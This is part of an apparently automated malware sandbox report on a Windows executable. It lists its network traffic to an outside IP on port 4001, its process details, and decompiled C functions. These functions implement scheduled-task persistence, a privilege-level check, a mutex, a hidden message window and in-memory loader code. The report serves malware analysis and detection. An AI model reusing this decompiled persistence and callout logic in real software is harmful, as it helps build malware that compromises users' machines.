Sep 28, 2021 22:55:58.959173918 CEST	4001	49737	195.2.76.80	192.168.2.5
Sep 28, 2021 22:55:58.959376097 CEST	49737	4001	192.168.2.5	195.2.76.80
Sep 28, 2021 22:55:58.961188078 CEST	49737	4001	192.168.2.5	195.2.76.80
Sep 28, 2021 22:55:59.015851974 CEST	4001	49737	195.2.76.80	192.168.2.5
Sep 28, 2021 22:56:59.098980904 CEST	4001	49737	195.2.76.80	192.168.2.5
Sep 28, 2021 22:56:59.099082947 CEST	49737	4001	192.168.2.5	195.2.76.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 22:55:39.071176052 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:55:39.092514038 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 28, 2021 22:55:52.510478020 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:55:52.531438112 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:08.996906996 CEST	59736	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:09.008327007 CEST	51058	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:09.009557962 CEST	52636	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:09.015840054 CEST	53	59736	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:09.025854111 CEST	53	51058	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:09.028796911 CEST	53	52636	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:10.804732084 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:10.838479042 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:12.936032057 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:12.956618071 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:14.049093008 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:14.068384886 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:22.138421059 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:22.157696962 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:33.172739983 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:33.192276001 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:34.901355982 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:34.929548025 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:48.265033960 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:48.272474051 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:48.277496099 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:48.284090042 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:48.300012112 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:48.304588079 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 28, 2021 22:56:51.814475060 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:56:51.836976051 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:10.779336929 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:10.798232079 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:12.431210995 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:12.456815958 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:12.821331024 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:12.849160910 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:13.833950996 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:13.868139029 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:13.961755991 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:13.983016968 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:21.946546078 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:21.982047081 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:32.765587091 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:32.784827948 CEST	53	57128	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:39.870764971 CEST	54791	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:39.898802996 CEST	53	54791	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:46.983958006 CEST	50463	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:47.003386021 CEST	53	50463	8.8.8.8	192.168.2.5
Sep 28, 2021 22:57:47.137305975 CEST	50394	53	192.168.2.5	8.8.8.8
Sep 28, 2021 22:57:47.155344963 CEST	53	50394	8.8.8.8	192.168.2.5

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ZDqKJkJ1Sb.exe PID: 3528 Parent PID: 5188

General

Start time:	22:55:44
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\ZDqKJkJ1Sb.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ZDqKJkJ1Sb.exe'
Imagebase:	0x400000
File size:	120320 bytes
MD5 hash:	1D29D6CD39010976ADCB9FCBA517F3BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ZDqKJkJ1Sb.exe PID: 5916 Parent PID: 904

General

Start time:	22:55:52
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\ZDqKJkJ1Sb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ZDqKJkJ1Sb.exe start
Imagebase:	0x400000
File size:	120320 bytes
MD5 hash:	1D29D6CD39010976ADCB9FCBA517F3BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ZDqKJkJ1Sb.exe PID: 3528 Parent PID: 5188 ZDqKJkJ1Sb.exeCOMMON

Executed Functions

Function 004020A8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239
timecomCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020A8(void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				char _v1032;
				char _v1036;
				void* _v1040;
				char _v1044;
				intOrPtr _v1068;
				intOrPtr _v1072;
				short _v1074;
				short _v1076;
				short _v1078;
				short _v1080;
				short _v1082;
				short _v1084;
				short _v1086;
				short _v1088;
				char _v1092;
				void* _v1096;
				struct _SYSTEMTIME _v1112;
				struct _FILETIME _v1120;
				char _v1376;
				char _v1888;
				char _v2144;
				char _v2400;
				char _v2656;
				char _v2912;
				char _v3168;
				char _v3424;
				char* _t100;
				intOrPtr* _t109;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t118;
				intOrPtr* _t120;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t130;
				intOrPtr* _t133;
				void* _t141;
				short _t149;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t172;

				E00402CB2(__eflags, _a4,  &_v1376);
				E00402CB2(__eflags, _a12,  &_v1888);
				E004023E6(__eflags, _a4); // executed
				_push(0); // executed
				L004030D8(); // executed
				E00402BBA(0x4050bb, 0x10,  &_v2400);
				E00402BBA(0x4050cb, 0x10,  &_v2656);
				_push( &_v8);
				_push( &_v2656);
				_push(1);
				_push(0);
				_t100 =  &_v2400;
				_push(_t100);
				L004030D2();
				if(_t100 >= 0) {
					E00402BBA(0x4050db, 0x10,  &_v2912);
					E00402BBA(0x4050eb, 0x10,  &_v3168);
					_t109 = _v8;
					_t111 =  *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x20))))(_t109,  &_v1376,  &_v3168,  &_v2912,  &_v12); // executed
					if(_t111 >= 0) {
						_t113 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x70))))(_t113, 0x2202);
						E00402BA3( &_v1036, 0x400); // executed
						_t118 = E0040287E(); // executed
						if(_t118 != 0x4000 && _t118 != 0x3000) {
							_v1036 = 0x100;
							_push( &_v1036);
							_push( &_v1032);
							_push(2);
							L004030EA();
						}
						_t120 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x78))))(_t120,  &_v1032, 0);
						_t124 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x80))))(_t124,  &_v1888); // executed
						_t207 = _a16;
						if(_a16 != 0) {
							E00402CB2(_t207, _a16,  &_v2144);
							_t172 = _v12;
							 *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x88))))(_t172,  &_v2144);
						}
						_t126 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0xa8))))(_t126, 0xd65cb580);
						_push( &_v1040);
						_push( &_v1044);
						_t130 = _v12;
						_push(_t130);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0xc))))() >= 0) {
							E00402BA3( &_v1092, 0x30);
							GetLocalTime( &_v1112);
							SystemTimeToFileTime( &_v1112,  &_v1120);
							_t141 = 0x47868c00;
							if(_a20 == 1) {
								_t141 = 0x29b92700;
							}
							_v1120.dwLowDateTime = _v1120.dwLowDateTime + _t141;
							asm("adc [ebp-0x458], edx");
							FileTimeToSystemTime( &_v1120,  &_v1112);
							if(_a20 == 0) {
								_v1072 = 0x80520;
								_v1068 = 2;
							}
							_v1092 = 0x30;
							_v1074 = _v1112.wMinute;
							_v1076 = _v1112.wHour;
							_v1084 = _v1112.wDay;
							_v1086 = _v1112.wMonth;
							_t149 = _v1112.wYear;
							_v1088 = _t149;
							_v1082 = _t149 + 0x64;
							_v1080 = 1;
							_v1078 = 1;
							_t152 = _v1040;
							 *((intOrPtr*)( *((intOrPtr*)( *_t152 + 0xc))))(_t152,  &_v1092);
							E00402BBA(0x4050fb, 0x10,  &_v3424);
							_push( &_v1096);
							_push( &_v3424);
							_t158 = _v12;
							_push(_t158);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t158))))() >= 0) {
								_t163 = _v1096;
								 *((intOrPtr*)( *((intOrPtr*)( *_t163 + 0x18))))(_t163, 0, 1); // executed
								if(_a24 != 0) {
									_t167 = _v12;
									 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x30))))(_t167); // executed
								}
								_t165 = _v1096;
								 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 8))))(_t165);
							}
							_t161 = _v1040;
							 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
						}
						_t133 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 8))))(_t133);
					}
					_t112 = _v8;
					_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 8))))(_t112); // executed
				}
				L004030DE(); // executed
				return _t100;
			}

0x004020be
0x004020cd
0x004020d5
0x004020da
0x004020dc
0x004020ef
0x00402102
0x0040210a
0x00402111
0x00402112
0x00402114
0x00402116
0x0040211c
0x0040211d
0x00402125
0x00402139
0x0040214c
0x0040216a
0x00402173
0x00402178
0x00402183
0x0040218c
0x0040219a
0x0040219f
0x004021a9
0x004021b5
0x004021c5
0x004021cc
0x004021cd
0x004021cf
0x004021cf
0x004021dd
0x004021e6
0x004021ef
0x004021fb
0x004021fd
0x00402201
0x0040220d
0x00402219
0x00402225
0x00402225
0x0040222c
0x00402238
0x00402240
0x00402247
0x00402248
0x0040224d
0x00402256
0x00402265
0x00402271
0x00402284
0x00402289
0x00402292
0x00402294
0x00402294
0x0040229b
0x004022a1
0x004022b5
0x004022be
0x004022c0
0x004022ca
0x004022ca
0x004022d4
0x004022e4
0x004022f2
0x00402300
0x0040230e
0x00402315
0x0040231c
0x00402327
0x0040232e
0x00402337
0x00402347
0x00402353
0x00402363
0x0040236e
0x00402375
0x00402376
0x0040237b
0x00402383
0x00402389
0x00402395
0x0040239b
0x0040239d
0x004023a6
0x004023a6
0x004023a8
0x004023b4
0x004023b4
0x004023b6
0x004023c2
0x004023c2
0x004023c4
0x004023cd
0x004023cd
0x004023cf
0x004023d8
0x004023d8
0x004023da
0x004023e3

APIs

Part of subcall function 004023E6: CoInitialize.OLE32(00000000), ref: 00402404
Part of subcall function 004023E6: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 00402445
Part of subcall function 004023E6: CoUninitialize.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 0040247B

CoInitialize.OLE32(00000000), ref: 004020DC
CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 0040211D
CoUninitialize.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 004023DA

Part of subcall function 0040287E: GetCurrentProcess.KERNEL32 ref: 00402895
Part of subcall function 0040287E: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 004028A3
Part of subcall function 0040287E: LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 004028B5
Part of subcall function 0040287E: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 004028CC
Part of subcall function 0040287E: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028DA
Part of subcall function 0040287E: LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028E4
Part of subcall function 0040287E: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 004028FB
Part of subcall function 0040287E: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040290B
Part of subcall function 0040287E: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00402923
Part of subcall function 0040287E: CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040292B

GetUserNameExW.SECUR32(00000002,?,?,?,00000400,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 004021CF
GetLocalTime.KERNEL32(?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 00402271
SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00402284
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018), ref: 004022B5

Strings

0, xrefs: 004022D4

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LocalTime$Token$AllocCreateFileFreeInformationInitializeInstanceProcessSystemUninitialize$AuthorityCloseCurrentHandleNameOpenUser
String ID: 0
API String ID: 1653648096-4108050209
Opcode ID: b3cc0e449862453e223a4fb563fa856a0cdcb771f07f38f442db6dd6699d3378
Instruction ID: d2504d8edf1705ddb07240cfd3e684c56b7407d0b8a9720604ede3a4450b607e
Opcode Fuzzy Hash: b3cc0e449862453e223a4fb563fa856a0cdcb771f07f38f442db6dd6699d3378
Instruction Fuzzy Hash: D3A10BB5900618AFDB10DF94CD85FDAB3BCAF48304F1040EAE609E7291D679AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004023E6, Relevance: 4.6, APIs: 3, Instructions: 57
comCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004023E6(void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v16;
				char _v1032;
				char _v1288;
				char _v1544;
				char* _t23;
				intOrPtr* _t27;
				intOrPtr* _t29;
				void* _t36;

				E00402BA3( &_v1544,  &_v16 - _t36);
				_push(0); // executed
				L004030D8(); // executed
				E00402BBA(0x4050bb, 0x10,  &_v1288);
				E00402BBA(0x4050cb, 0x10,  &_v1544);
				_push( &_v8);
				_push( &_v1544);
				_push(1);
				_push(0);
				_t23 =  &_v1288;
				_push(_t23); // executed
				L004030D2(); // executed
				_t38 = _t23;
				if(_t23 >= 0) {
					E00402CB2(_t38, _a4,  &_v1032);
					_t27 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t27 + 0x1c))))(_t27,  &_v1032); // executed
					_t29 = _v8;
					_t23 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 8))))(_t29); // executed
				}
				L004030DE(); // executed
				return _t23;
			}

0x004023fd
0x00402402
0x00402404
0x00402417
0x0040242a
0x00402432
0x00402439
0x0040243a
0x0040243c
0x0040243e
0x00402444
0x00402445
0x0040244a
0x0040244d
0x00402459
0x00402465
0x0040246e
0x00402470
0x00402479
0x00402479
0x0040247b
0x00402484

APIs

CoInitialize.OLE32(00000000), ref: 00402404
CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 00402445
CoUninitialize.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 0040247B

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 7199bf091349f2d770c2b77bb9cb2e9df9fe423437531acb8f70b2d6a0e0a78b
Instruction ID: ee92d15b6c1896149d8c07049ee13461bb46ea22a6d0193078288697e025474d
Opcode Fuzzy Hash: 7199bf091349f2d770c2b77bb9cb2e9df9fe423437531acb8f70b2d6a0e0a78b
Instruction Fuzzy Hash: 8C111FB66001087ADB10EA95CD85FDF77BCDB48304F1044A6F705E61C1DAB5AB458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0062092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0062095F
GetProcAddress., xrefs: 006209DC, 006209DF, 006209E4
l, xrefs: 00620966

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004026A1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 78
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026A1(intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				struct _WNDCLASSA _v48;
				struct HWND__* _v52;
				struct tagMSG _v80;
				char _v336;
				char _v592;
				struct HWND__* _t44;
				void* _t55;
				void* _t56;

				E00402BA3( &_v592, _t55 - _t56);
				E00402BBA("Microsoft", 0xa,  &_v336);
				E00402BBA("win32app", 9,  &_v592);
				_v8 = GetModuleHandleA(0);
				_v48.style = 0;
				_v48.lpfnWndProc = _a4;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _v8;
				_v48.lpszMenuName = 0;
				_v48.lpszClassName =  &_v592;
				_v48.hIcon = LoadIconA(0, 0x7f04);
				_v48.hCursor = LoadCursorA(0, 0x7f01);
				_v48.hbrBackground = 6;
				RegisterClassA( &_v48);
				_t44 = CreateWindowExA(0x80,  &_v592,  &_v336, 0xc80000, 0xfa0, 0xfa0, 0x1f4, 0x96, 0, 0, _v8, 0); // executed
				_v52 = _t44;
				ShowWindow(_v52, 1); // executed
				UpdateWindow(_v52);
				L1:
				GetMessageA( &_v80, 0, 0, 0);
				TranslateMessage( &_v80);
				DispatchMessageA( &_v80);
				goto L1;
			}

0x004026b5
0x004026c8
0x004026db
0x004026e7
0x004026ea
0x004026f4
0x004026f7
0x004026fe
0x00402708
0x0040270b
0x00402718
0x00402727
0x00402736
0x00402739
0x00402744
0x0040277e
0x00402783
0x0040278b
0x00402793
0x00402798
0x004027a2
0x004027ab
0x004027b4
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,win32app,00000009,?,Microsoft,0000000A,?,?), ref: 004026E2
LoadIconA.USER32(00000000,00007F04), ref: 00402722
LoadCursorA.USER32 ref: 00402731
RegisterClassA.USER32 ref: 00402744
CreateWindowExA.USER32 ref: 0040277E
ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000), ref: 0040278B
UpdateWindow.USER32(?), ref: 00402793
GetMessageA.USER32 ref: 004027A2
TranslateMessage.USER32(?), ref: 004027AB
DispatchMessageA.USER32 ref: 004027B4

Strings

Microsoft, xrefs: 004026C3
win32app, xrefs: 004026D6

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: MessageWindow$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
String ID: Microsoft$win32app
API String ID: 1919798786-2644191155
Opcode ID: fe1a89c82acfa9335293fc2587ea0468b61e365bd776cea69594b540cde8141b
Instruction ID: d957c1f4cb42465741694de127319c0437f6bb7ea5b588441986ba897e742e48
Opcode Fuzzy Hash: fe1a89c82acfa9335293fc2587ea0468b61e365bd776cea69594b540cde8141b
Instruction Fuzzy Hash: 36311971E40309BAEB50EFE5CD4AFDEB7B8AB04704F50406AF608BA1C1D7F866049B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040287E, Relevance: 15.1, APIs: 10, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040287E() {
				void* _v8;
				void** _v16;
				long _v20;
				long _v24;
				int _t30;

				_v24 = 0;
				_v20 = 8;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_v16 = LocalAlloc(0, _v20);
					_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
					if(_v20 > 8) {
						LocalFree(_v16);
						_v16 = LocalAlloc(0, _v20);
						_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
					}
					if(_t30 != 0 && GetSidSubAuthority( *_v16, 0) != 0) {
						E00402B1C(_t34,  &_v24, 4);
					}
					LocalFree(_v16);
					CloseHandle(_v8); // executed
				}
				return _v24;
			}

0x00402887
0x0040288e
0x004028aa
0x004028ba
0x004028cc
0x004028d5
0x004028da
0x004028e9
0x004028fb
0x004028fb
0x00402902
0x0040291b
0x0040291b
0x00402923
0x0040292b
0x0040292b
0x00402937

APIs

GetCurrentProcess.KERNEL32 ref: 00402895
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 004028A3
LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 004028B5
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 004028CC
LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028DA
LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028E4
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 004028FB
GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040290B
LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00402923
CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040292B

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Local$Token$AllocFreeInformationProcess$AuthorityCloseCurrentHandleOpen
String ID:
API String ID: 1358183241-0
Opcode ID: 48fcc9b0c832dd6d096bc34ff97a7db52107236acb17e10917358097f5860b7b
Instruction ID: 659c31aa751460ccb818eaa5a6d65241a666f7eaca525ead9889415a3a5bdf7f
Opcode Fuzzy Hash: 48fcc9b0c832dd6d096bc34ff97a7db52107236acb17e10917358097f5860b7b
Instruction Fuzzy Hash: 67116771E0010DBADF11AFE1CD02FAFBB79AB44309F00402AB210B50E5DBB94B14AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401031, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
sleepsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401031() {
				char _v1028;
				void* _v1036;
				char _v1040;
				void* _t11;
				void* _t13;
				void* _t21;
				void* _t22;
				void* _t23;

				E00402BA3( &_v1040, _t21 - _t22);
				CreateThread(0, 0, E004026A1, E004027BF, 0, 0); // executed
				_v1036 = OpenMutexA(0x100000, 0, "wow64");
				CreateMutexA(0, 0, "wow64"); // executed
				_t11 = E00402938(_t23, "start"); // executed
				if(_t11 == 0) {
					L3:
					EnumWindows(E00402487, 0); // executed
					_t13 = E0040287E(); // executed
					_t26 = _t13 - 0x1000;
					if(_t13 == 0x1000) {
						goto L2;
					}
					GetModuleFileNameA(0,  &_v1028, 0x100);
					E004020A8(_t26, "wow64", 0,  &_v1028, "start", 0, 1); // executed
				} else {
					if(_v1036 == 0) {
						L2:
						E00401549();
						goto L3;
					}
				}
				Sleep(0xea60); // executed
				return 0;
			}

0x00401045
0x0040105c
0x00401072
0x00401081
0x0040108b
0x00401092
0x004010a2
0x004010a9
0x004010ae
0x004010b3
0x004010b8
0x00000000
0x00000000
0x004010c8
0x004010e4
0x00401094
0x0040109b
0x0040109d
0x0040109d
0x00000000
0x0040109d
0x0040109b
0x004010ee
0x004010f6

APIs

CreateThread.KERNEL32 ref: 0040105C
OpenMutexA.KERNEL32 ref: 0040106D
CreateMutexA.KERNEL32(00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,0040102B), ref: 00401081

Part of subcall function 00402938: GetCommandLineW.KERNEL32(?,?), ref: 00402954
Part of subcall function 00402938: CommandLineToArgvW.SHELL32(00000000,?,?,?), ref: 00402962

EnumWindows.USER32(00402487,00000000), ref: 004010A9
GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64,00100000,00000000,wow64,00000000,00000000,004026A1,004027BF), ref: 004010C8
Sleep.KERNEL32(0000EA60,wow64,00000000,?,start,00000000,00000001,00000000,?,00000100,00402487,00000000,start,00000000,00000000,wow64), ref: 004010EE

Part of subcall function 00401549: Sleep.KERNEL32(00002710,?), ref: 00401567
Part of subcall function 00401549: WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 00401578
Part of subcall function 00401549: Sleep.KERNEL32(0002BF20,?,?,?,4001,000000FF,?,00000202,?,00002710,?), ref: 004015EE

Strings

start, xrefs: 00401086, 004010D1
wow64, xrefs: 00401061, 00401078, 004010DF

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Sleep$CommandCreateLineMutex$ArgvEnumFileModuleNameOpenStartupThreadWindows
String ID: start$wow64
API String ID: 4100216516-53727345
Opcode ID: c6afe987ea8d2b83df149e9a718a5926686a1fb57531d27b9b8c0db4827928c4
Instruction ID: 293ce2b1b78586e2bd88d1d0124769ce59921d79aa433574afd859985a6aaea9
Opcode Fuzzy Hash: c6afe987ea8d2b83df149e9a718a5926686a1fb57531d27b9b8c0db4827928c4
Instruction Fuzzy Hash: 250184717C430575EA71B6A28E4BFAE71589B04F49F24047FB745B90C2D9FCA680892E

Uniqueness

Uniqueness Score: -1.00%

Function 0062003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D

Strings

kernel32.dll, xrefs: 0062008F, 00620095
cess, xrefs: 0062018D

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: c5e5fe9ffaeb04a65ae6859affd46c3813a22428fd7fa8b9d0c22071adcf30bf
